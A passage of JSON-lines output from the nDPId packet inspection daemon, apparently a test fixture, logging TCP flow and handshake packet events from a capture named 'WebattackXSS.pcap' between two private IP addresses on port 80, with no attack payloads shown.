-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4JYOrdMQ\/Wbl7qAScSBFIQAAAgQFtAQCCAoD5KCPATrPGgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1499347466554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347466554,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvhAAD4GmuCsEAABwKgKMuCWAFD9ZuXuDq3TEYAQAOXkKAAAAQEICgE6zxoD5KCP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347467793,"flow_last_seen":1499347467793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347467793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1499347467793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82olAAD4G60asEAABwKgKMuCkAFDARwrZAAAAAKACchDhYwAAAgQFtAQCCAoBOtBQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":1499347467794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467794,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4KSQwyNLwEcK2qAScSCIigAAAgQFtAQCCAoD5KHFATrQUAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":1499347467794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347467794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02opAAD4G602sEAABwKgKMuCkAFDARwrakMMjTIAQAOUnkgAAAQEICgE60FAD5KHF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347469060,"flow_last_seen":1499347469060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347469060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1499347469060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H0RAAD4GpoysEAABwKgKMuCyAFAQe87JAAAAAKACchDL9AAAAgQFtAQCCAoBOtGNAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":1499347469061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4LKyNukIEHvOyqAScSCKrQAAAgQFtAQCCAoD5KMCATrRjQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":1499347469061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347469061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H0VAAD4GppOsEAABwKgKMuCyAFAQe87KsjbpCYAQAOUptQAAAQEICgE60Y0D5KMC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347470328,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347470328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvtAAD4GktWsEAABwKgKMuDAAFBLw+AxAAAAAKACchB9+QAAAgQFtAQCCAoBOtLKAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4MBkpV8JS8PgMqAScSATBgAAAgQFtAQCCAoD5KQ\/ATrSygEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvxAAD4GktysEAABwKgKMuDAAFBLw+AyZKVfCoAQAOWyDQAAAQEICgE60soD5KQ\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347471594,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347471594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VndAAD4Gb1msEAABwKgKMuDOAFAlMIJxAAAAAKACchABAwAAAgQFtAQCCAoBOtQGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":2,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4M5lR7ajJTCCcqAScSA8lgAAAgQFtAQCCAoD5KV8ATrUBgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":3,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VnhAAD4Gb2CsEAABwKgKMuDOAFAlMIJyZUe2pIAQAOXbnQAAAQEICgE61AYD5KV8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347474100,"flow_last_seen":1499347474100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347474100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1499347474100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IdhAAD4Go\/isEAABwKgKMuDoAFDgcfehAAAAAKACchDOAwAAAgQFtAQCCAoBOtZ5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":1499347474100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4OgnZn4J4HH3oqAScSB9oAAAAgQFtAQCCAoD5KfuATrWeQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":1499347474101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347474101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IdlAAD4Go\/+sEAABwKgKMuDoAFDgcfeiJ2Z+CoAQAOUcqAAAAQEICgE61nkD5Kfu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347475384,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yGtAAD4G\/WSsEAABwKgKMuD2AFCdWh\/RAAAAAKACchDnnAAAAgQFtAQCCAoBOte6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4PYsYAVjnVof0qAScSAJpQAAAgQFtAQCCAoD5KkvATrXugEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":1499347475385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347475385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yGxAAD4G\/WusEAABwKgKMuD2AFCdWh\/SLGAFZIAQAOWorAAAAQEICgE617oD5Kkv"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347476667,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347476667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86aJAAD4G3C2sEAABwKgKMuEEAFDYCDFYAAAAAKACchCaGQAAAgQFtAQCCAoBOtj6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4QTgdpFp2AgxWaAScSB6wwAAAgQFtAQCCAoD5KpwATrY+gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":3,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06aNAAD4G3DSsEAABwKgKMuEEAFDYCDFZ4HaRaoAQAOUZywAAAQEICgE62PoD5Kpw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347479172,"flow_last_seen":1499347479172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347479172,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1499347479172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iKNAAD4GPS2sEAABwKgKMuEeAFCusFPOAAAAAKACchCebgAAAgQFtAQCCAoBOtttAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":1499347479172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4R7s2gFNrrBTz6AScSAAXwAAAgQFtAQCCAoD5KziATrbbQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":3,"flow_last_seen":1499347479173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347479173,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iKRAAD4GPTSsEAABwKgKMuEeAFCusFPP7NoBToAQAOWfZgAAAQEICgE6220D5Kzi"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347480438,"flow_last_seen":1499347480438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347480438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 